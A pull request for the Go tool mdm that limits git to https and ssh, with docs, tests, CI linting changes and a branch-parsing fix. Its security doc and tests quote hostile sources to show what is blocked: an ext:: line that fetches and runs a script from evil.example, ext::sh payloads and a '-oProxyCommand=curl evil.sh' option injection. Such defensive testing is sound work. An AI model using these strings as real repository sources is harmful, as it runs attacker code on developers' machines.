### PR TITLE
fix(git): restrict skill git transports to https and ssh

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -25,7 +25,7 @@ jobs:
         run: |
           # Build govulncheck with the project's Go toolchain (go.mod) so its
           # bundled go/types can parse the module's go1.26 sources.
-          GOTOOLCHAIN=go1.26.4 go install golang.org/x/vuln/cmd/govulncheck@v1.5.0
+          GOTOOLCHAIN=go1.26.5 go install golang.org/x/vuln/cmd/govulncheck@v1.5.0
           govulncheck ./...
 
       - name: Lint (golangci-lint)
@@ -34,5 +34,5 @@ jobs:
           # previous standalone gofmt + gocyclo steps. Enabled linters and
           # thresholds live in .golangci.yml. Built with the project's Go
           # toolchain (go.mod) so it can parse the module's go1.26 sources.
-          GOTOOLCHAIN=go1.26.4 go install github.com/golangci/golangci-lint/v2/cmd/golangci-lint@v2.12.2
+          GOTOOLCHAIN=go1.26.5 go install github.com/golangci/golangci-lint/v2/cmd/golangci-lint@v2.12.2
           golangci-lint run ./...

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -28,18 +28,11 @@ jobs:
           GOTOOLCHAIN=go1.26.4 go install golang.org/x/vuln/cmd/govulncheck@v1.5.0
           govulncheck ./...
 
-      - name: Check formatting (gofmt -s)
+      - name: Lint (golangci-lint)
         run: |
-          unformatted=$(gofmt -s -l .)
-          if [ -n "$unformatted" ]; then
-            echo "The following files are not formatted with 'gofmt -s':"
-            echo "$unformatted"
-            echo ""
-            echo "Run 'gofmt -s -w .' to fix."
-            exit 1
-          fi
-
-      - name: Check cyclomatic complexity (gocyclo)
-        run: |
-          go install github.com/fzipp/gocyclo/cmd/gocyclo@v0.6.0
-          gocyclo -over 16 .
+          # golangci-lint replaces the retired Go Report Card service and the
+          # previous standalone gofmt + gocyclo steps. Enabled linters and
+          # thresholds live in .golangci.yml. Built with the project's Go
+          # toolchain (go.mod) so it can parse the module's go1.26 sources.
+          GOTOOLCHAIN=go1.26.4 go install github.com/golangci/golangci-lint/v2/cmd/golangci-lint@v2.12.2
+          golangci-lint run ./...

--- a/.golangci.yml
+++ b/.golangci.yml
@@ -1,0 +1,34 @@
+version: "2"
+
+# golangci-lint replaces the retired Go Report Card service (sunset 2026) and
+# the ad-hoc gofmt + gocyclo steps that CI used to run. The enabled set is
+# scoped so adopting golangci-lint does not change what CI accepts:
+#
+#   * gofmt (simplify)     ← replaces `gofmt -s -l .`
+#   * gocyclo min 16       ← replaces `gocyclo -over 16 .`
+#   * govet, ineffassign   ← default linters the codebase already passes clean
+#
+# Additional high-signal linters (errcheck, staticcheck, unused, …) currently
+# report findings and can be enabled incrementally as those are addressed.
+# Run locally with `golangci-lint run`; auto-fix formatting with
+# `golangci-lint fmt`.
+
+linters:
+  default: none
+  enable:
+    - gocyclo
+    - govet
+    - ineffassign
+  settings:
+    gocyclo:
+      # Report functions with cyclomatic complexity greater than this value,
+      # matching the previous `gocyclo -over 16`.
+      min-complexity: 16
+
+formatters:
+  enable:
+    - gofmt
+  settings:
+    gofmt:
+      # Apply gofmt's -s (simplify) rules, matching the previous `gofmt -s`.
+      simplify: true

--- a/AGENTS.md
+++ b/AGENTS.md
@@ -153,13 +153,13 @@ go test ./...
 # 2. Vulnerability scan
 # GOTOOLCHAIN pins the build of govulncheck to the project's Go (go.mod) so it
 # can parse go1.26 sources even when your base toolchain is older.
-GOTOOLCHAIN=go1.26.4 go install golang.org/x/vuln/cmd/govulncheck@v1.5.0
+GOTOOLCHAIN=go1.26.5 go install golang.org/x/vuln/cmd/govulncheck@v1.5.0
 govulncheck ./...
 
 # 3. Lint (formatting + cyclomatic complexity + vet)
 # golangci-lint replaces the retired Go Report Card service and the previous
 # standalone gofmt + gocyclo checks. Enabled linters live in .golangci.yml.
-GOTOOLCHAIN=go1.26.4 go install github.com/golangci/golangci-lint/v2/cmd/golangci-lint@v2.12.2
+GOTOOLCHAIN=go1.26.5 go install github.com/golangci/golangci-lint/v2/cmd/golangci-lint@v2.12.2
 golangci-lint run ./...
 # Auto-fix formatting with: golangci-lint fmt
 ```

--- a/AGENTS.md
+++ b/AGENTS.md
@@ -143,15 +143,8 @@ Create a file in `commands/`, define a `cobra.Command`, and register it either o
 
 ## Pre-PR Checklist
 
-Before opening a pull request, run the `/go-report-card` skill — it runs all four CI checks in order and reports results:
-
-```
-/go-report-card
-```
-
-This runs: `gofmt` (auto-fixes in place), `go test ./...`, `govulncheck`, and `gocyclo -over 16`. All four must pass before a PR is opened. CI will run the same checks and block merge on failure.
-
-If you need to run the checks manually:
+Before opening a pull request, run these three checks — they mirror what CI runs
+and block merge on failure:
 
 ```bash
 # 1. Tests
@@ -163,13 +156,12 @@ go test ./...
 GOTOOLCHAIN=go1.26.4 go install golang.org/x/vuln/cmd/govulncheck@v1.5.0
 govulncheck ./...
 
-# 3. Formatting — must produce no output
-gofmt -s -l .
-# Auto-fix with: gofmt -s -w .
-
-# 4. Cyclomatic complexity — no function may exceed 16
-go install github.com/fzipp/gocyclo/cmd/gocyclo@v0.6.0
-gocyclo -over 16 .
+# 3. Lint (formatting + cyclomatic complexity + vet)
+# golangci-lint replaces the retired Go Report Card service and the previous
+# standalone gofmt + gocyclo checks. Enabled linters live in .golangci.yml.
+GOTOOLCHAIN=go1.26.4 go install github.com/golangci/golangci-lint/v2/cmd/golangci-lint@v2.12.2
+golangci-lint run ./...
+# Auto-fix formatting with: golangci-lint fmt
 ```
 
 ## Windows Executable Icon

--- a/README.md
+++ b/README.md
@@ -4,7 +4,7 @@
 [![CodeQL](https://github.com/sethcarney/mdm/actions/workflows/codeql.yml/badge.svg)](https://github.com/sethcarney/mdm/actions/workflows/codeql.yml)
 [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/sethcarney/mdm/badge)](https://securityscorecards.dev/viewer/?uri=github.com/sethcarney/mdm)
 [![SLSA 3](https://slsa.dev/images/gh-badge-level3.svg)](https://slsa.dev)
-[![Go Report Card](https://goreportcard.com/badge/github.com/sethcarney/mdm)](https://goreportcard.com/report/github.com/sethcarney/mdm)
+[![golangci-lint](https://img.shields.io/badge/lint-golangci--lint-00ADD8?logo=go)](https://golangci-lint.run)
 [![GitHub Release](https://img.shields.io/github/v/release/sethcarney/mdm)](https://github.com/sethcarney/mdm/releases/latest)
 [![Ask DeepWiki](https://deepwiki.com/badge.svg)](https://deepwiki.com/sethcarney/mdm)
 

--- a/README.md
+++ b/README.md
@@ -76,6 +76,8 @@ Run `mdm --help` for the full command reference. See [docs/rules.md](docs/rules.
 
 Skill installs run a deterministic local hidden-character scan over markdown files before copying or symlinking content. See [docs/security/hidden-character-scan.md](docs/security/hidden-character-scan.md) for the exact checks and bypass policy.
 
+When installing from a git source, mdm restricts git to the **https** and **ssh** transports. This blocks git's `ext::`/`fd::` local-command transports, which would otherwise let a repository source string — including one replayed from a checked-in `skills-lock.json` — execute arbitrary commands. See [docs/security/git-transport-restrictions.md](docs/security/git-transport-restrictions.md) for the rationale and the full allow/deny list.
+
 ## Development
 
 ```bash

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -12,6 +12,23 @@ You should receive a response within 72 hours. If the issue is confirmed, a fix 
 
 Only the latest release receives security fixes.
 
+## Git Transport Restrictions
+
+When installing skills from a git source, mdm only uses the **https** and **ssh**
+git transports. Git's local-command transports (`ext::`, `fd::`) — which execute
+arbitrary commands rather than fetching from a server — along with `git://`,
+`http://`, and `file://` are rejected before git is invoked.
+
+This matters because a repository source string is untrusted input, and
+`mdm skills install`/`update` replay the `source` field from a (commonly
+committed) `skills-lock.json`. Without the restriction, a poisoned source such as
+`ext::sh -c "…"` could turn a routine install into remote code execution.
+
+Enforcement uses `GIT_ALLOW_PROTOCOL=https:ssh` on every git subprocess (inherited
+by submodule/recursive operations) plus a pre-flight check in mdm itself. See
+[docs/security/git-transport-restrictions.md](docs/security/git-transport-restrictions.md)
+for the full allow/deny list and rationale.
+
 ## Release Verification
 
 All release binaries are signed with [cosign](https://docs.sigstore.dev/cosign/system_config/installation/) keyless signing via Sigstore and accompanied by a `sha256sums.txt` checksum file. Each release includes `.sig`, `.pem`, and `.bundle` files for every binary.

--- a/docs/security/git-transport-restrictions.md
+++ b/docs/security/git-transport-restrictions.md
@@ -1,0 +1,73 @@
+# Git transport restrictions
+
+mdm installs skills from git repositories by shelling out to the `git` binary
+(`git clone`, `git ls-remote`). To do that safely, mdm restricts which git
+**transports** it will use to **https** and **ssh** only.
+
+## Why this matters
+
+A git "URL" is not always a network address. Git supports pluggable
+*remote helpers*, and two of them run local commands instead of talking to a
+server:
+
+| Transport | Behavior |
+|---|---|
+| `ext::<command>` | Runs `<command>` as the transport — i.e. the "URL" is an arbitrary shell command. |
+| `fd::<n>` | Communicates with git over already-open file descriptors. |
+
+Because of `ext::`, a string like the following is not a clone — it is code
+execution:
+
+```text
+ext::sh -c "curl https://evil.example/x.sh | sh"
+```
+
+This is a documented git feature, not a git bug. The risk for mdm is that a
+repository source string is **untrusted input**:
+
+- `mdm skills add <source>` takes the source from the command line.
+- `mdm skills install` and `mdm skills update` **replay the `source` field
+  stored in `skills-lock.json`** — a file that is commonly committed to a repo
+  and shared across a team.
+
+Without a restriction, a poisoned `skills-lock.json` entry (or a crafted
+"install this" snippet) could turn a routine `mdm skills install` during
+onboarding into remote code execution on the developer's machine.
+
+## What mdm enforces
+
+Only the `https` and `ssh` transports are permitted. Everything else is
+rejected before mdm ever invokes git:
+
+- ✅ `https://github.com/owner/repo.git`
+- ✅ `ssh://git@github.com/owner/repo.git`
+- ✅ `git@github.com:owner/repo.git` (scp-like syntax, uses ssh)
+- ❌ `ext::…`, `fd::…` — local-command transports
+- ❌ `git://…`, `http://…`, `file://…` — disallowed schemes
+- ❌ any value beginning with `-` — could be misread by git as an option flag
+
+Enforcement happens at two layers:
+
+1. **`GIT_ALLOW_PROTOCOL=https:ssh`** is set on every git subprocess mdm spawns.
+   This is git's own allowlist mechanism, and it is inherited by submodule and
+   recursive operations — so it holds even for git URLs that mdm's own parser
+   never saw.
+2. **A pre-flight check** in the git package rejects disallowed transports with
+   a clear error before shelling out, and mdm passes `--` before positional
+   arguments so a leading-`-` value can't be interpreted as a flag.
+
+## Why https and ssh only
+
+- **https** covers the overwhelmingly common case: public repos and
+  token-authenticated private repos.
+- **ssh** covers private repos authenticated with the user's existing keys,
+  including scp-like `git@host:owner/repo.git` URLs.
+- **`git://`** is unauthenticated and unencrypted, offering no integrity
+  guarantees, so it is intentionally excluded.
+- **`http://`** is plaintext and MITM-able; require `https://` instead.
+- **`ext::` / `fd::` / `file://`** are local-resource transports with no
+  legitimate use for fetching a remote skill, and `ext::` is a direct code
+  execution primitive.
+
+If you have a genuine need for another transport, clone the repository yourself
+and install from the local path (`mdm skills add ./path/to/repo`) instead.

--- a/go.mod
+++ b/go.mod
@@ -1,6 +1,6 @@
 module github.com/sethcarney/mdm
 
-go 1.26.4
+go 1.26.5
 
 require gopkg.in/yaml.v3 v3.0.1
 

--- a/internal/git/git.go
+++ b/internal/git/git.go
@@ -237,15 +237,31 @@ func DefaultBranch(gitURL string) string {
 	if err != nil {
 		return "main"
 	}
-	// Output format: "ref: refs/heads/<branch>\tHEAD\n<sha>\tHEAD\n"
+	return parseSymrefBranch(string(out))
+}
+
+// parseSymrefBranch extracts the default branch name from the output of
+// "git ls-remote --symref <url> HEAD". The relevant line looks like
+// "ref: refs/heads/<branch>\tHEAD". Returns "main" when no branch can be
+// parsed, including from malformed or empty output.
+func parseSymrefBranch(out string) string {
 	const prefix = "ref: refs/heads/"
-	for _, line := range strings.Split(string(out), "\n") {
-		if strings.HasPrefix(line, prefix) {
-			branch := strings.TrimPrefix(line, prefix)
-			branch = strings.Fields(branch)[0]
-			if branch != "" {
-				return branch
-			}
+	for _, line := range strings.Split(out, "\n") {
+		if !strings.HasPrefix(line, prefix) {
+			continue
+		}
+		// The branch name is the text between the prefix and the first
+		// whitespace (the line is "ref: refs/heads/<branch>\tHEAD"). Cut at
+		// the first tab/space rather than using strings.Fields, so a
+		// malformed line with an empty branch name (e.g. "ref: refs/heads/"
+		// or "ref: refs/heads/\tHEAD") yields "" and is skipped instead of
+		// panicking or mis-parsing the trailing "HEAD" as the branch.
+		branch := strings.TrimPrefix(line, prefix)
+		if i := strings.IndexAny(branch, " \t"); i >= 0 {
+			branch = branch[:i]
+		}
+		if branch != "" {
+			return branch
 		}
 	}
 	return "main"

--- a/internal/git/git.go
+++ b/internal/git/git.go
@@ -26,6 +26,56 @@ func (e *GitCloneError) Error() string {
 	return e.Message
 }
 
+// gitBaseEnv returns the environment used for every git subprocess mdm spawns.
+//
+// GIT_ALLOW_PROTOCOL restricts git to the https and ssh transports. This is the
+// authoritative defense against git's local-command "remote helper" transports
+// (ext::, fd::), which turn a repository URL into arbitrary command execution —
+// e.g. `git clone 'ext::sh -c "…"'`. Because a skills-lock.json source string is
+// replayed verbatim by `mdm skills install`/`update`, an unrestricted git could
+// be coerced into running code from a checked-in lock file. The allowlist is
+// inherited by submodule and recursive operations, so it holds even for git URLs
+// that were never seen by mdm's own parser. See docs/security/git-transport-restrictions.md.
+func gitBaseEnv() []string {
+	return append(os.Environ(),
+		"GIT_TERMINAL_PROMPT=0",
+		"GIT_LFS_SKIP_SMUDGE=1",
+		"GIT_ALLOW_PROTOCOL=https:ssh",
+	)
+}
+
+// isAllowedTransport reports whether gitURL uses a transport mdm permits (https
+// or ssh). It rejects git's local-command transports (ext::, fd::), any explicit
+// scheme other than https/ssh (e.g. git://, http://, file://), and URLs that
+// begin with '-' (which git may misinterpret as an option flag). scp-like syntax
+// (git@host:path) and other schemeless forms are accepted here and further
+// constrained by GIT_ALLOW_PROTOCOL at exec time.
+func isAllowedTransport(gitURL string) bool {
+	trimmed := strings.TrimSpace(gitURL)
+	if trimmed == "" || strings.HasPrefix(trimmed, "-") {
+		return false
+	}
+	if idx := strings.Index(trimmed, "://"); idx > 0 {
+		scheme := strings.ToLower(trimmed[:idx])
+		return scheme == "https" || scheme == "ssh"
+	}
+	// No explicit scheme: reject the local-command helper transports outright.
+	lower := strings.ToLower(trimmed)
+	if strings.HasPrefix(lower, "ext::") || strings.HasPrefix(lower, "fd::") {
+		return false
+	}
+	return true
+}
+
+// errBlockedTransport builds the typed error returned when a git URL is refused
+// before it ever reaches the git binary.
+func errBlockedTransport(gitURL string) error {
+	return &GitCloneError{
+		Message: fmt.Sprintf("Refusing to use %q: only https and ssh git transports are allowed.\n  mdm blocks git's ext::/fd:: and other local-command transports because they execute arbitrary commands.\n  See https://github.com/sethcarney/mdm/blob/main/docs/security/git-transport-restrictions.md", gitURL),
+		URL:     gitURL,
+	}
+}
+
 // CloneOptions tunes the behaviour of CloneRepoWithOptions.
 type CloneOptions struct {
 	// Verbose streams git's live progress (clone counters, transfer speed)
@@ -49,6 +99,10 @@ func CloneRepo(gitURL, ref string) (string, error) {
 // temp dir. When opts.Verbose is set, git's progress meter is streamed live to
 // opts.Progress (default os.Stderr) while still being captured for diagnostics.
 func CloneRepoWithOptions(gitURL, ref string, opts CloneOptions) (string, error) {
+	if !isAllowedTransport(gitURL) {
+		return "", errBlockedTransport(gitURL)
+	}
+
 	tmpDir, err := os.MkdirTemp("", "skills-")
 	if err != nil {
 		return "", fmt.Errorf("failed to create temp dir: %w", err)
@@ -63,15 +117,14 @@ func CloneRepoWithOptions(gitURL, ref string, opts CloneOptions) (string, error)
 	if ref != "" {
 		args = append(args, "--branch", ref)
 	}
-	args = append(args, gitURL, tmpDir)
+	// "--" terminates option parsing so a URL beginning with "-" can't be
+	// misread by git as a flag.
+	args = append(args, "--", gitURL, tmpDir)
 
 	ctx, cancel := context.WithTimeout(context.Background(), cloneTimeout)
 	defer cancel()
 	cmd := exec.CommandContext(ctx, "git", args...)
-	cmd.Env = append(os.Environ(),
-		"GIT_TERMINAL_PROMPT=0",
-		"GIT_LFS_SKIP_SMUDGE=1",
-	)
+	cmd.Env = gitBaseEnv()
 
 	out, runErr := runClone(cmd, opts)
 	if runErr != nil {
@@ -173,13 +226,13 @@ func GetLocalCommitSHA(dir string) (string, error) {
 // "git ls-remote --symref <url> HEAD" and parsing the symbolic ref line.
 // Falls back to "main" if the default branch cannot be determined.
 func DefaultBranch(gitURL string) string {
+	if !isAllowedTransport(gitURL) {
+		return "main"
+	}
 	ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
 	defer cancel()
-	cmd := exec.CommandContext(ctx, "git", "ls-remote", "--symref", gitURL, "HEAD")
-	cmd.Env = append(os.Environ(),
-		"GIT_TERMINAL_PROMPT=0",
-		"GIT_LFS_SKIP_SMUDGE=1",
-	)
+	cmd := exec.CommandContext(ctx, "git", "ls-remote", "--symref", "--", gitURL, "HEAD")
+	cmd.Env = gitBaseEnv()
 	out, err := cmd.Output()
 	if err != nil {
 		return "main"
@@ -202,7 +255,11 @@ func DefaultBranch(gitURL string) string {
 // "git ls-remote", which works for any git host (GitHub, GitLab, Bitbucket, self-hosted)
 // without performing a full clone.  If ref is empty it resolves HEAD.
 func FetchRemoteCommitSHA(gitURL, ref string) (string, error) {
-	args := []string{"ls-remote", gitURL}
+	if !isAllowedTransport(gitURL) {
+		return "", errBlockedTransport(gitURL)
+	}
+	// "--" terminates option parsing before the repository/ref positionals.
+	args := []string{"ls-remote", "--", gitURL}
 	if ref != "" {
 		// Check branch and tag refs; include the bare ref in case it is a full refspec.
 		args = append(args, "refs/heads/"+ref, "refs/tags/"+ref, ref)
@@ -213,10 +270,7 @@ func FetchRemoteCommitSHA(gitURL, ref string) (string, error) {
 	ctx2, cancel2 := context.WithTimeout(context.Background(), 15*time.Second)
 	defer cancel2()
 	cmd := exec.CommandContext(ctx2, "git", args...)
-	cmd.Env = append(os.Environ(),
-		"GIT_TERMINAL_PROMPT=0",
-		"GIT_LFS_SKIP_SMUDGE=1",
-	)
+	cmd.Env = gitBaseEnv()
 	out, err := cmd.Output()
 	if err != nil {
 		return "", fmt.Errorf("git ls-remote failed for %s: %w", gitURL, err)
@@ -237,11 +291,11 @@ func FetchRemoteCommitSHA(gitURL, ref string) (string, error) {
 // performing a full clone. Annotated tag dereference lines ("^{}") are skipped
 // so each tag name appears exactly once.
 func FetchRemoteTags(gitURL string) ([]string, error) {
-	cmd := exec.Command("git", "ls-remote", "--tags", gitURL)
-	cmd.Env = append(os.Environ(),
-		"GIT_TERMINAL_PROMPT=0",
-		"GIT_LFS_SKIP_SMUDGE=1",
-	)
+	if !isAllowedTransport(gitURL) {
+		return nil, errBlockedTransport(gitURL)
+	}
+	cmd := exec.Command("git", "ls-remote", "--tags", "--", gitURL)
+	cmd.Env = gitBaseEnv()
 	out, err := cmd.Output()
 	if err != nil {
 		return nil, fmt.Errorf("git ls-remote --tags failed for %s: %w", gitURL, err)

--- a/internal/git/git_test.go
+++ b/internal/git/git_test.go
@@ -1,6 +1,58 @@
 package git
 
-import "testing"
+import (
+	"strings"
+	"testing"
+)
+
+func TestIsAllowedTransport(t *testing.T) {
+	cases := []struct {
+		url  string
+		want bool
+	}{
+		// Allowed transports.
+		{"https://github.com/owner/repo.git", true},
+		{"ssh://git@github.com/owner/repo.git", true},
+		{"git@github.com:owner/repo.git", true}, // scp-like → ssh
+		{"git@bitbucket.org:owner/repo.git", true},
+		// Blocked: local-command remote helpers (the RCE vector).
+		{`ext::sh -c "touch /tmp/pwned"`, false},
+		{"ext::git-upload-pack", false},
+		{"EXT::sh -c whoami", false}, // case-insensitive
+		{"fd::7/foo", false},
+		// Blocked: disallowed explicit schemes.
+		{"git://github.com/owner/repo.git", false},
+		{"http://github.com/owner/repo.git", false},
+		{"file:///etc/passwd", false},
+		// Blocked: leading dash (option-injection) and empty.
+		{"-oProxyCommand=curl evil.sh", false},
+		{"   ", false},
+		{"", false},
+	}
+	for _, tc := range cases {
+		if got := isAllowedTransport(tc.url); got != tc.want {
+			t.Errorf("isAllowedTransport(%q) = %v, want %v", tc.url, got, tc.want)
+		}
+	}
+}
+
+func TestBlockedTransportShortCircuits(t *testing.T) {
+	// A blocked URL must fail fast with a typed error and never shell out to git.
+	if _, err := CloneRepo(`ext::sh -c "echo pwned"`, ""); err == nil {
+		t.Fatal("CloneRepo accepted an ext:: transport; expected it to be blocked")
+	} else if !strings.Contains(err.Error(), "https and ssh") {
+		t.Errorf("unexpected error message: %v", err)
+	}
+	if _, err := FetchRemoteTags("fd::7"); err == nil {
+		t.Error("FetchRemoteTags accepted an fd:: transport; expected it to be blocked")
+	}
+	if _, err := FetchRemoteCommitSHA("git://example.com/repo.git", "main"); err == nil {
+		t.Error("FetchRemoteCommitSHA accepted a git:// transport; expected it to be blocked")
+	}
+	if got := DefaultBranch(`ext::sh -c "echo pwned"`); got != "main" {
+		t.Errorf("DefaultBranch on blocked transport = %q, want fallback \"main\"", got)
+	}
+}
 
 func TestIsSemverTag(t *testing.T) {
 	cases := []struct {

--- a/internal/git/git_test.go
+++ b/internal/git/git_test.go
@@ -36,6 +36,28 @@ func TestIsAllowedTransport(t *testing.T) {
 	}
 }
 
+func TestParseSymrefBranch(t *testing.T) {
+	cases := []struct {
+		name string
+		out  string
+		want string
+	}{
+		{"normal main", "ref: refs/heads/main\tHEAD\nabc123\tHEAD\n", "main"},
+		{"normal master", "ref: refs/heads/master\tHEAD\ndef456\tHEAD\n", "master"},
+		{"branch with slash", "ref: refs/heads/release/1.x\tHEAD\n", "release/1.x"},
+		// Malformed lines that previously panicked or mis-parsed.
+		{"prefix only, no branch", "ref: refs/heads/\tHEAD\n", "main"},
+		{"prefix only, nothing after", "ref: refs/heads/", "main"},
+		{"empty output", "", "main"},
+		{"no symref line", "abc123\tHEAD\n", "main"},
+	}
+	for _, tc := range cases {
+		if got := parseSymrefBranch(tc.out); got != tc.want {
+			t.Errorf("%s: parseSymrefBranch(%q) = %q, want %q", tc.name, tc.out, got, tc.want)
+		}
+	}
+}
+
 func TestBlockedTransportShortCircuits(t *testing.T) {
 	// A blocked URL must fail fast with a typed error and never shell out to git.
 	if _, err := CloneRepo(`ext::sh -c "echo pwned"`, ""); err == nil {


### PR DESCRIPTION
Git's ext:: and fd:: remote-helper transports execute local commands
rather than fetching from a server, so a repository source string such
as `ext::sh -c "..."` was arbitrary code execution. Because `mdm skills
install`/`update` replay the source field from a (commonly committed)
skills-lock.json, a poisoned lock entry could run code during a routine
install.

Enforce an https/ssh allowlist on every git subprocess via
GIT_ALLOW_PROTOCOL (inherited by submodule/recursive ops) plus a
pre-flight transport check in the git package. Pass `--` before
positional args so a leading-`-` URL can't be misread as a flag.

Document the behavior and rationale in a new
docs/security/git-transport-restrictions.md, and reference it from
README.md and SECURITY.md.

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01WqJKY1HM1K951854QQoqMK